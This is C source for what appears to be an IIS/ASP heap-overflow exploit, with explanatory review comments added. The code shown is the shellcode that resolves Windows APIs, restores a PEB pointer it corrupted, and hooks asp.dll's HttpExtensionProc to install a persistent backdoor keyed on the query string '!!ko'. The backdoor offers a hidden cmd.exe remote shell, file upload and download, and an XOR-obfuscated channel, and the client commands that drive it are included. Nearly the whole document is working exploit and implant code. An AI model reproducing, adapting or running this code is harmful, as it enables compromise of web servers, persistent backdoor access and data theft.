 * table in main(). NOTE(review): this relies on the MSVC debug-build frame
 * layout and breaks under any other compiler or optimisation setting.
 */
void shellcodefn(char *ecb)
{
    char Buff[SHELLBUFFSIZE+2];
    int *except[3];                 /* SEH record: [0] next, [1] handler, [2] saved FS:[0] */
    FARPROC memcpyadd;              /* filled by apifnadd[17] */
    FARPROC msvcrtdlladd;           /* [16] slot: the \x09msvcrt.dll entry, left untouched */
    FARPROC HttpExtensionProcadd;   /* [15] */
    FARPROC Aspdlladd;              /* [14] slot: \x09asp.dll */
    FARPROC RtlEnterCriticalSectionadd; /* [13] */
    FARPROC Ntdlladd;               /* [12] slot: \x09ntdll.dll */
    FARPROC Sleepadd;               /* [11] */
    FARPROC GetLastErroradd;        /* [10] */
    FARPROC GetFileSizeadd;         /* [9] */
    FARPROC CreateFileAadd;         /* [8] */
    FARPROC WriteFileadd;           /* [7] */
    FARPROC ReadFileadd;            /* [6] */
    FARPROC PeekNamedPipeadd;       /* [5] */
    FARPROC CloseHandleadd;         /* [4] */
    FARPROC CreateProcessadd;       /* [3] */
    FARPROC CreatePipeadd;          /* [2] */
    FARPROC procloadlib;            /* [1] LoadLibraryA */
    FARPROC apifnadd[1];
    FARPROC procgetadd=0;           /* GetProcAddress, found by walking kernel32's export table */
    FARPROC writeclient;            /* ecb->WriteClient */
    FARPROC readclient;             /* ecb->ReadClient */
    HCONN ConnID;
    FARPROC shellcodefnadd=ecb;
    char *stradd,*stradd2,*dooradd;
    int imgbase,fnbase,i,k,l,thedoor;
    HANDLE libhandle;
    int fpt; //libwsock32;
    STARTUPINFO siinfo;
    PROCESS_INFORMATION ProcessInformation;
    HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
    int lBytesRead;
    int lockintvar1,lockintvar2;    /* shadow the globals: the payload has its own keystream state */
    char lockcharvar;
    int shelllocknum;
    // unsigned char temp;
    SECURITY_ATTRIBUTES sa;

    /*
     * stradd = address of the NOPs right after "nextcall: call getstradd",
     * i.e. the end of this function's code = start of the appended string
     * table. Also install our own SEH record at except[] (saving the old
     * FS:[0] into except[2]).
     */
    _asm {
        jmp nextcall
    getstradd:
        pop stradd
        lea EDI,except
        mov eax,dword ptr FS:[0]
        mov dword ptr [edi+0x08],eax
        mov dword ptr FS:[0],EDI
    }
    except[0]=0xffffffff;
    except[1]=stradd-0x07;   /* "execptprogram:" (jmp errprogram), 7 bytes before stradd */
    imgbase=0x77e00000;
    /* Every "call getexceptretadd" records the address of the following
     * instruction as the EIP to resume at if an access fault occurs. */
    _asm{
        call getexceptretadd
    }

    /*
     * Find kernel32 by scanning 64 KB-aligned addresses for an MZ/PE image
     * whose export directory Name is "KERNEL32" ('NREK','23LE' are the
     * little-endian int constants), then look up "GetProcA" by name.
     * Offsets used: e_lfanew 0x3c; export directory RVA at NT header +0x78;
     * within IMAGE_EXPORT_DIRECTORY: Name +0xc, Base +0x10, NumberOfNames
     * +0x18, AddressOfFunctions +0x1c, AddressOfNames +0x20,
     * AddressOfNameOrdinals +0x24. The ordinal is biased by (Base-1),
     * which is 0 when Base==1. Faults while probing are swallowed by the
     * SEH handler, which resumes at the "for".
     * NOTE(review): the comma in the loop condition means only
     * procgetadd==0 is tested; imgbase<0xbffa0000 is evaluated and
     * discarded, so an unsuccessful scan never terminates on its own.
     */
    for(;imgbase<0xbffa0000,procgetadd==0;){
        imgbase+=0x10000;
        if(imgbase==0x78000000) imgbase=0xbff00000;   /* jump from the NT range to the 9x range */
        if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
            fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
            k=*(int *)(fnbase+0xc)+imgbase;
            if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
                libhandle=imgbase;
                k=imgbase+*(int *)(fnbase+0x20);
                for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
                    if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor') {
                        k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
                        k+=*(int *)(fnbase+0x10)-1;
                        k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
                        procgetadd=k+imgbase;
                        break;
                    }
                }
            }
        }
    }
    // (original comments mis-encoded; they appear to say: "locate the
    //  KERNEL32 module base and the GetProcAddress API address" and
    //  "note: probed pages may not exist" -- hence the SEH frame above)
    if(procgetadd==0) goto die ;

    /*
     * Resolve the import table (see str in main): \x09-prefixed entries
     * select the DLL via LoadLibraryA, others go through GetProcAddress
     * into apifnadd[k] -- i.e. into the FARPROC locals above.
     */
    i=stradd;
    for(k=1;*stradd!=0;++k) {
        if(*stradd==0x9) libhandle=procloadlib(stradd+1);
        else apifnadd[k]=procgetadd(libhandle,stradd);
        for(;*stradd!=0;++stradd){ }
        ++stradd;
    }
    ++stradd;
    /*
     * NOTE(review): 0x7ffdf020 lies in the PEB on Windows 2000 (the PEB is
     * mapped at 0x7ffdf000 there). Restoring a lock routine pointer here
     * suggests the heap overwrite clobbered it to get control; confirm
     * against the target before relying on this.
     */
    k=0x7ffdf020;
    *(int *)k=RtlEnterCriticalSectionadd;
    k=stradd;      /* k -> "cmd.exe\0..." string block */
    stradd=i;
    thedoor=0;
    i=0;

    /* dooradd = address of "getexceptretadd:", just past "call getdooradd".
     * l = current esp, the upper bound for the memory scans below. */
    _asm{
        jmp getdoorcall
    getdooradd:
        pop dooradd;
        mov l,esp
        call getexceptretadd
    }
    /*
     * Entry check. Via the door, ecb is a real ECB: cbSize==0x90
     * (sizeof EXTENSION_CONTROL_BLOCK) and lpszQueryString (+0x64) starts
     * with "!!ko" -> thedoor=1, i stays 0. Via the overflow, ecb==1 and the
     * dereference faults; the handler resumes at the "if(i==0)" with i
     * already incremented, so we fall into the install path.
     */
    if(i==0){
        ++i;
        if(*(int *)ecb==0x90){
            if(*(int *)(*(int *)(ecb+0x64))=='ok!!') {
                i=0;
                thedoor=1;
            }
        }
    }
    if(i!=0){
        /*
         * Install the hook. Patch the two "push imm32" slots of the door
         * stub: the fall-through target (dooradd-0x0c) gets the real
         * HttpExtensionProc, the trigger target (dooradd-0x13) gets this
         * copy of shellcodefn.
         */
        *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
        *(int *)(dooradd-0x13)=shellcodefnadd;
        /*
         * Scan memory from page 1 up to esp for the current request's ECB:
         * cbSize 0x90, ConnID (+8) equal to its own address (an empirical
         * IIS property the author relies on), query string "!!ko". On an
         * access fault the handler resumes at "i=ecb", which rounds the
         * faulting address to its page and skips to the next one.
         */
        ecb=0;
        _asm{
            call getexceptretadd
        }
        i=ecb;
        i&=0xfffff000;
        ecb=i;
        ecb+=0x1000;
        for(;i<l;++i,++ecb) {
            if(*(int *)ecb==0x90){
                if(*(int *)(ecb+8)==(int *)ecb){
                    if(*(int *)*(int *)(ecb+0x64)=='ok!!') break;
                }
            }
        }
        /* Second scan: replace every stored pointer to asp.dll's
         * HttpExtensionProc with the door stub (dooradd-7 = "jmp door"). */
        i=0;
        _asm{
            call getexceptretadd
        }
        i&=0xfffff000;
        i+=0x1000;
        for(;i<l;++i){
            if(*(int *)i==HttpExtensionProcadd){
                *(int *)i=dooradd-7;
                // break;
            }
        }
        // *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
    }

    /* ISAPI callbacks and connection id from the ECB
     * (WriteClient +0x84, ReadClient +0x88, ConnID +8). */
    writeclient= *(int *)(ecb+0x84);
    readclient = *(int *)(ecb+0x88);
    ConnID = *(int *)(ecb+8) ;
    stradd=k;
    /* Restore the SEH chain we saved in except[2]; if we arrived through
     * the overflow (thedoor==0) the saved chain is not trusted and the
     * list is terminated instead. */
    _asm{
        lea edi,except
        mov eax,dword ptr [edi+0x08]
        mov dword ptr fs:[0],eax
    }
    if(thedoor==0){
        _asm{
            mov eax,0xffffffff
            mov dword ptr fs:[0],eax
        }
    }

    /* stradd2 -> "cmd.exe"; stradd -> "\r\nexit\r\n" (8 bytes later);
     * stradd+9 -> "XORDATA"; stradd+0x11 -> "xordatareset". */
    stradd2=stradd;
    stradd+=8;
    /* Reply: 0x20 bytes of the request's lpszPathInfo (+0x6c) followed by
     * the "XORDATA" marker the client waits for. */
    k=0x20;
    writeclient(Con nID,*(int *)(ecb+0x6c),&k,0);
    k=8;
    writeclient(ConnID,stradd+9,&k,0);
    // Sleepadd(100);
    /* A query string "!!koxton" (bytes of 'notx') disables the XOR layer
     * by seeding the keystream with 0. */
    shelllocknum=LOCKBIGNUM2;
    if(*(int *)*(int *)(ecb+0x64)=='ok!!'&&*(int *)(*(int *)(ecb+0x64)+4)=='notx') shelllocknum=0;
    // iiscmd:
    lockintvar1=shelllocknum%LOCKBIGNUM;
    lockintvar2=lockintvar1;

iiscmd:
    /*
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
    */
    /* Spawn the command (stradd2) hidden, with stdin from pipe 2 and
     * stdout/stderr into pipe 1. Handles are inheritable. */
    sa.nLength=12;
    sa.lpSecurityDescriptor=0;
    sa.bInheritHandle=TRUE;
    CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
    CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);
    // ZeroMemory(&siinfo,sizeof(siinfo));
    _asm{
        lea EDI,siinfo
        xor eax,eax
        mov ecx,0x11
        repnz stosd
    }
    siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    siinfo.wShowWindow = SW_HIDE;
    siinfo.hStdInput = hReadPipe2;
    siinfo.hStdOutput=hWritePipe1;
    siinfo.hStdError =hWritePipe1;
    k=0;
    // while(k==0)
    // {
    k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo, &ProcessInformation);
    // stradd+=8;
    // }
    Sleepadd(200);
    // PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0 );

    /*
     * Pump loop. Output from cmd.exe is encoded and sent to the client;
     * when there is none for 50 polls, one block is read from the client,
     * decoded and dispatched.
     */
    i=0;
    while(1) {
        PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
        if(lBytesRead>0) {
            i=0;
            ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
            if(lBytesRead>0) {
                for(k=0;k<lBytesRead;++k){
                    lockintvar2=lockintvar2*0x100;
                    lockintvar2=lockintvar2%LOCKBIGNUM;
                    lockcharvar=lockintvar2%0x100;
                    Buff[k]^=lockcharvar;   // DATAXORCODE;
                    // Buff[k]^=DATAXORCODE;
                }
                writeclient(ConnID,Buff,&lBytesRead,0);   // HSE_IO_SYNC);
                // Sleepadd(20);
            }
        }
        else{
            // Sleepadd(10);
            l=0;
            if(i<50){
                l=1;
                ++i;
                k=1;
                lBytesRead=0;
            }
            while(l==0){
                i=0;
                lBytesRead=SHELLBUFFSIZE;
                k=readclient(ConnID,Buff,&lBytesRead);
                for(l=0;l<lBytesRead;++l){
                    lockintvar1=lockintvar1*0x100;
                    lockintvar1=lockintvar1%LOCKBIGNUM;
                    lockcharvar=lockintvar1%0x100;
                    Buff[l]^=lockcharvar;   // DATAXORCODE;
                }
                /* "iisc ": tell the current cmd.exe to exit, run the new command. */
                if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2]=='s'&&Buff[3]=='c'&&Buff[4]==' '){
                    k=8;
                    WriteFileadd(hWritePipe2,stradd,k,&k,0);   // exit cmd.exe
                    WriteFileadd(hWritePipe2,stradd,k,&k,0);   // exit cmd.exe
                    stradd2=Buff+5;
                    Buff[lBytesRead]=0;
                    goto iiscmd;
                }
                /* "reset": acknowledge with "xordatareset" and re-seed both directions. */
                if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Buff[2]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){
                    lBytesRead=0x0c;
                    writeclient(ConnID,stradd+0x11,&lBytesRead,0);
                    lockintvar1=shelllocknum%LOCKBIGNUM;
                    lockintvar2=lockintvar1;
                    lBytesRead=0;
                }
                /* "iisrr": exit cmd.exe, zero the door's fall-through target, hang this thread. */
                if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){
                    k=8;
                    WriteFileadd(hWritePipe2,stradd,k,&k,0);   // exit cmd.exe
                    WriteFileadd(hWritePipe2,stradd,k,&k,0);   // exit cmd.exe
                    *(int *)(dooradd-0x0c)=0;
                    Sleepadd(0x7fffffff);
                    _asm{
                        mov eax,0
                        mov esp,0
                        jmp eax
                    }
                }
                /* "put ": Buff+4 = 32-bit byte count, Buff+8 = target path.
                 * NOTE(review): CreateFileA failure is not checked (only
                 * GetLastError is read into k and overwritten). */
                if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]==' ') {
                    l=*(int *)(Buff+4);
                    // WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
                    fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+ GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 );
                    k=GetLastErroradd();
                    i=0;
                    while(l>0){
                        lBytesRead=SHELLBUFFSIZE;
                        k=readclient(ConnID,Buff,&lBytesRead);
                        if(k==1){
                            if(lBytesRead>0){
                                for(k=0;k<lBytesRead;++k){
                                    lockintvar1=lockintvar1*0x100;
                                    lockintvar1=lockintvar1%LOCKBIGNUM;
                                    lockcharvar=lockintvar1%0x100;
                                    Buff[k]^=lockcharvar;   // DATAXORCODE;
                                }
                                l-=lBytesRead;
                                // if(fpt>0)
                                WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
                                // else Sleepadd(010);
                            }
                            // if(i>100) l=0;
                        }
                        else {
                            Sleepadd(0100);
                            ++i;
                        }
                        if(i>10000) l=0;
                    }
                    CloseHandleadd(fpt);
                    l=0;
                }
                else{
                    /* "get ": send "size" + 32-bit length, then the file in
                     * SHELLBUFFSIZE blocks; up to 100 empty reads allowed. */
                    if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]==' '){
                        // fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
                        fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
                        Sleepadd(100);
                        l=GetFileSizeadd(fpt,&k);
                        *(int *)Buff='ezis';   //size
                        *(int *)(Buff+4)=l;
                        lBytesRead=8;
                        for(i=0;i<lBytesRead;++i){
                            lockintvar2=lockintvar2*0x100;
                            lockintvar2=lockintvar2%LOCKBIGNUM;
                            lockcharvar=lockintvar2%0x100;
                            Buff[i]^=lockcharvar;   // DATAXORCODE;
                        }
                        writeclient(ConnID,Buff,&lBytesRead,0);   // HSE_IO_SYNC);
                        // Sleepadd(100);
                        i=0;
                        while(l>0){
                            k=SHELLBUFFSIZE;
                            ReadFileadd(fpt,Buff,k,&k,0);
                            if(k>0){
                                for(i=0;i<k;++i){
                                    lockintvar2=lockintvar2*0x100;
                                    lockintvar2=lockintvar2%LOCKBIGNUM ;
                                    lockcharvar=lockintvar2%0x100;
                                    Buff[i]^=lockcharvar;   // DATAXORCODE;
                                }
                                i=0;
                                l-=k;
                                writeclient(ConnID,Buff,&k,0);   // HSE_IO_SYNC);
                                // Sleepadd(100);
                                // k=readclient(ConnID,Buff,&lBytesRead);
                            }
                            else ++i;
                            if(i>100) l=0;
                        }
                        CloseHandleadd(fpt);
                        l=0;
                    }
                    else l=1;
                }
            }
            if(k!=1){
                /* ReadClient failed: tell cmd.exe to exit. On WSAECONNRESET
                 * (0x2746) either return to IIS (hooked entry) or park the
                 * thread forever (overflow entry has no frame to return to). */
                k=8;
                WriteFileadd(hWritePipe2,stradd,k,&k,0);   // exit cmd.exe
                WriteFileadd(hWritePipe2,stradd,k,&k,0);   // exit cmd.exe
                WriteFileadd(hWritePipe2,stradd,k,&k,0);   // exit cmd.exe
                k=GetLastErroradd();
                while(k==0x2746){
                    if(thedoor==1) goto asmreturn;
                    Sleepadd(0x7fffffff);   // (original comment mis-encoded; presumably "hang")
                }
            }
            else{
                /* Not a recognised command: feed it to cmd.exe's stdin. */
                WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
                // Sleepadd(1000);
            }
        }
    }

die:
    goto die ;

    /*
     * Trailing stubs. They are part of the lifted bytes and are addressed
     * relative to dooradd/stradd (the //N comments are the instruction
     * sizes those offsets depend on):
     *   asmreturn       return HSE_STATUS_SUCCESS to IIS (hooked entry)
     *   door            the HttpExtensionProc replacement: if the ECB's
     *                   query string starts with "!!ko" jump to the
     *                   resident shellcodefn copy (push imm32 at
     *                   dooradd-0x13), otherwise to the real
     *                   HttpExtensionProc (push imm32 at dooradd-0x0c)
     *   getexceptretadd store the caller's return address into the
     *                   errprogram immediate at stradd-0x0e
     *   errprogram      SEH handler: set CONTEXT.Eip ([esp+0xc]+0xb8) to
     *                   that address and return ExceptionContinueExecution
     *   nextcall        entered first; its return address is stradd
     */
    _asm{
    asmreturn:
        mov eax,HSE_STATUS_SUCCESS
        leave
        ret 04
    door:
        push eax
        mov eax,[esp+0x08]
        mov eax,[eax+0x64]
        mov eax,[eax]
        cmp eax,'ok!!'
        jnz jmpold
        pop eax
        push 0x12345678   //dooradd-0x13
        ret
    jmpold:
        pop eax
        push 0x12345678   //dooradd-0xc
        ret   //1
        jmp door   //2
    getdoorcall:
        call getdooradd   //5
    getexceptretadd:
        pop eax
        push eax
        mov edi,dword ptr [stradd]
        mov dword ptr [edi-0x0e],eax
        ret
    errprogram:
        mov eax,dword ptr [esp+0x0c]
        add eax,0xb8
        mov dword ptr [eax],0x11223344   //stradd-0xe
        xor eax,eax   //2
        ret   //1
    execptprogram:
        jmp errprogram   //2 bytes stradd-7
    nextcall:
        call getstradd   //5 bytes
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
    }
}

/*
 * Make the lifted copy of a debug-built function position independent
 * with respect to _chkesp: every "call rel32" (0xE8) in shellbuff whose
 * target, computed from the original address fnadd, is chkesp is replaced
 * by the 5 neutral bytes nop / inc ebx / dec ebx / inc ebx / dec ebx.
 *
 *   fnadd      address the code was copied from (for resolving rel32)
 *   shellbuff  the copy to patch in place
 *   chkesp     resolved address of _chkesp
 *   len        bytes to scan
 */
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
    int i,k;
    unsigned char temp;
    char *calladd;
    for(i=0;i<len;++i){
        temp=shellbuff[i];
        if(temp==0xe8){
            k=*(int *)(shellbuff+i+1);
            calladd=fnadd;
            calladd+=k;
            calladd+=i;
            calladd+=5;   /* target = address of next instruction + rel32 */
            if(calladd==chkesp){
                shellbuff[i]=0x90;
                shellbuff[i+1]=0x43;   // inc ebx
                shellbuff[i+2]=0x4b;   // dec ebx
                shellbuff[i+3]=0x43;
                shellbuff[i+4]=0x4b;
            }
        }
    }
}

/*
 * Client command "iisput <local file> [remote file]": upload a local file
 * to the implant. Wire format: "put " + 32-bit size + remote name at +8,
 * then the raw bytes in 0x800 blocks, all through newsend().
 *
 * NOTE(review): str is parsed by replacing blanks with NULs in place;
 * filename=="\x0" compares pointers against a string literal and only
 * works if the compiler pools identical literals; CreateFile/GetFileSize
 * results are not checked; fpt is a HANDLE stored in a FILE*.
 */
void iisput(int fd,char *str){
    char *filename;
    char *filename2;
    FILE *fpt;
    char buff[0x2000];
    int size=0x2000,i,j,filesize,filesizehigh;
    filename="\0";
    filename2="\0";
    j=strlen(str);
    for(i=0;i<j;++i,++str){ if(*str!=' '){ filename=str; break; } }
    for(;i<j;++i,++str){ if(*str==' ') { *str=0; break; } }
    ++i;
    ++str;
    for(;i<j;++i,++str){ if(*str!=' '){ filename2=str; break; } }
    for(;i<j;++i,++str){ if(*str==' ') { *str=0; break; } }
    if(filename=="\x0") {
        printf("\n iisput filename [path\\fiename]\n");
        return;
    }
    if(filename2=="\x0") filename2=filename;
    printf("\n begin put file:%s",filename);
    j=0;
    ioctlsocket(fd, FIONBIO, &j);   /* blocking for the transfer */
    Sleep(1000);
    fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,0);
    filesize=GetFileSize(fpt,&filesizehigh);
    strcpy(buff,"put ");
    *(int *)(buff+4)=filesize;
    filesize=*(int *)(buff+4);
    strcpy(buff+0x8,filename2);
    newsend(fd,buff,i+0x9,0);
    printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize);
    Sleep(1000);
    while(filesize>0){
        size=0x800;
        ReadFile(fpt,buff,size,&size,NULL);
        if(size>0){
            filesize-=size;
            newsend(fd,buff,size,0);
            // Sleep(0100);
        }
    }
    // size=filesize;
    // ReadFile(fpt,buff,size,&size,NULL);
    // if(size>0) send(fd,buff,size,0);
    CloseHandle(fpt);
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
    printf("\n put file ok!\n");
    Sleep(1000);
}

/*
 * Client command "iisget <local file> [remote file]": download a file
 * from the implant. Sends "get <remote name>", waits (up to 100 empty
 * reads) for a block starting with "size" + 32-bit length, writes any
 * bytes that arrived in the same block, then receives the rest.
 *
 * NOTE(review): same parsing/literal-comparison caveats as iisput();
 * CreateFileA result unchecked; buff[i]=0 after a 0x800-byte receive is
 * within bounds here (buff is 0x2000).
 */
void iisget(int fd,char *str){
    char *filename;
    char *filename2;
    FILE *fpt;
    char buff[0x2000];
    int size=0x2000,i,j,filesize,filesizehigh;
    filename="\0";
    filename2="\0";
    j=strlen(str);
    for(i=0;i<j;++i,++str){ if(*str!=' '){ filename=str; break; } }
    for(;i<j;++i,++str){ if(*str==' ') { *str=0; break; } }
    ++i;
    ++str;
    for(;i<j;++i,++str){ if(*str!=' '){ filename2=str; break; } }
    for(;i<j;++i,++str){ if(*str==' ') { *str=0; break; } }
    if(filename=="\x0") {
        printf("\n iisget filename [path\\fiename]\n");
        return;
    }
    if(filename2=="\x0") filename2=filename;
    printf("\n begin get file:%s",filename);
    fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
    strcpy(buff,"get ");
    strcpy(buff+0x4,filename2);
    newsend(fd,buff,i+0x5,0);
    printf("\n get file:%s from file:%s",filename,filename2);
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    i=0;
    filesize=0;
    j=0;
    while(j<100){
        // Sleep(100);
        i=newrecv(fd,buff,0x800,0);
        if(i>0){
            buff[i]=0;
            if(memcmp(buff,"size",4)==0){
                filesize=*(int *)(buff+4);
                j=100;
            }
            else {
                /*
                for(j=0;j<i;++j){
                    lockintvar1=lockintvar1*0x100;
                    lockintvar1=lockintvar1%LOCKBIGNUM;
                    lockcharvar=lockintvar1%0x100;
                    buff[j]^=lockcharvar;   // DATAXORCODE;
                }
                */
                j=0;
                printf("\n recv %s",buff);
            }
        }
        else ++j;
        // if(j>1000) i=0;
    }
    printf("\n file %d bytes %d\n",filesize,i);
    if(i>8){
        i-=8;
        filesize-=i;
        WriteFile(fpt,buff+8,i,&i,NULL);
    }
    while(filesize>0){
        size=newrecv(fd,buff,0x800,0);
        if(size>0){
            filesize-=size;
            WriteFile(fpt,buff,size,&size,NULL);
        }
        else {
            if(size==0) {
                printf("\n ftp close \n ");
            }
            else {
                printf("\n Sleep(100)");
                Sleep(100);
            }
        }
    }
    CloseHandle(fpt);
    printf("\n get file ok!\n");
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
}

/*
 * Client command "iisreset": send "reset", re-seed the local keystream
 * and wait for the implant's "xordatareset" acknowledgement (decoding
 * whatever follows it in the same block). str is unused.
 *
 * NOTE(review): the wait loop has no exit on a closed socket (the j==0
 * break is commented out), and buff[j]=0 writes past buff when recv()
 * fills all 0x2000 bytes.
 */
void iisreset(int fd,char *str){
    char buff[0x2000];
    int i,j;
    printf("\nreset xor data.\n");
    Sleep(1000);
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    strcpy(buff,"reset");
    newsend(fd,buff,strlen(buff),0);
    Sleep(1000);
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
    while(1){
        j=recv(fd,buff,0x2000,0);
        if(j>0){
            buff[j]=0;
            for(i=0;i<j;++i){ if(buff[i]==0) buff[i]='b'; }   /* so strstr can scan the whole block */
            // printf("\nrecv 0x%x bytes:%s",j,buff);
            if(strstr(buff,"xordatareset")!=0){
                printf("\nxor data reset ok.\n");
                for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){
                    lockintvar1=lockintvar1*0x100;
                    lockintvar1=lockintvar1%LOCKBIGNUM;
                    lockcharvar=lockintvar1%0x100;
                    buff[i]^=lockcharvar;   // DATAXORCODE;
                }
                break;
            }
        }
        // else if(j==0) break;
        // strcpy(buff,"\r\nmkdir d:\\test6\r\n");
        // newsend(fd,buff,strlen(buff),0);
    }
    Sleep(1000);
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
    // printf("aaa");
}

/*
 * Client command "iisdie": send "iisrr " (see shellcodefn: exit cmd.exe,
 * zero the door's fall-through target, hang the thread) and re-seed the
 * local keystream. str is unused.
 */
void iisdie(int fd,char *str){
    char buff[0x200];
    int j;
    printf("\niis die.\n");
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    Sleep(1000);
    strcpy(buff,"iisrr ");
    newsend(fd,buff,strlen(buff),0);
    Sleep(1000);
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
}

/*
 * Client command "iiscmd <command line>": ask the implant to replace its
 * cmd.exe with <command line> (wire format "iisc <cmd>"). Leading and
 * trailing blanks are stripped in place.
 *
 * NOTE(review): buff is 2000 bytes and cmd is copied with strcat without
 * a length check; cmd=="\x0" is a pointer comparison against a literal.
 */
void iiscmd(int fd,char *str){
    char *cmd="\0";
    char buff[2000];
    int i,j;
    j=strlen(str);
    for(i=0;i<j;++i,++str){ if(*str!=' '){ cmd=str; break; } }
    j=strlen(str);
    for(i=0;i<j;++i){
        if(*(str+j-i-1)!=' ') { break; }
        else *(str+j-i-1)=0;
    }
    if(cmd=="\x0") {
        printf("\niiscmd cmd\n");
        return;
    }
    printf("\nbegin run cmd:%s",cmd);
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    Sleep(1000);
    strcpy(buff,"iisc ");
    strcat(buff,cmd);
    newsend(fd,buff,strlen(buff),0);
    Sleep(1000);
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
    /*
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
    */
}

/*
 * recv() wrapper for the obfuscated channel. Once xordatabegin is set the
 * whole block is decoded with the receive keystream (lockintvar1). Before
 * that, the block is scanned for the implant's "XORDATA" marker; if found,
 * decoding is switched on and applied to the bytes after the marker.
 * Returns recv()'s result unchanged.
 *
 * NOTE(review): buff[k]=0 writes one past the end when recv() returns
 * exactly size bytes (the callers pass their full buffer size).
 */
int newrecv(int fd,char *buff,int size,int flag){
    int i,k;
    k=recv(fd,buff,size,flag);
    if(xordatabegin==1){
        for(i=0;i<k;++i){
            lockintvar1=lockintvar1*0x100;
            lockintvar1=lockintvar1%LOCKBIGNUM;
            lockcharvar=lockintvar1%0x100;
            buff[i]^=lockcharvar;   // DATAXORCODE;
        }
    }
    else{
        if(k>0){
            buff[k]=0;
            if(strstr(buff,"XORDATA")!=0) {
                xordatabegin=1;
                for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){
                    lockintvar1=lockintvar1*0x100;
                    lockintvar1=lockintvar1%LOCKBIGNUM;
                    lockcharvar=lockintvar1%0x100;
                    buff[i]^=lockcharvar;   // DATAXORCODE;
                }
            }
        }
    }
    return(k);
}

/*
 * send() wrapper for the obfuscated channel: encodes buff in place with
 * the send keystream (lockintvar2) and returns send()'s result. The
 * caller's buffer is modified.
 */
int newsend(int fd,char *buff,int size,int flag){
    int i;
    for(i=0;i<size;++i){
        lockintvar2=lockintvar2*0x100;
        lockintvar2=lockintvar2%LOCKBIGNUM;
        lockcharvar=lockintvar2%0x100;
        buff[i]^=lockcharvar;   // DATAXORCODE;
        // buff[i]^=DATAXORCODE;
    }
    return(send(fd,buff,size,flag));
}

/* Print the client's local command summary. */
void iishelp(){
    printf("\nusage:");
    printf("\niisget filename filename. get file from web server.");
    printf("\niisput filename filename. put file to web server.");
    printf("\niiscmd cmd. run cmd on web server.");
    printf("\niisreset. reset the xor data.");
    printf("\niisdie. reset the asp door.");
    printf("\n\n");
}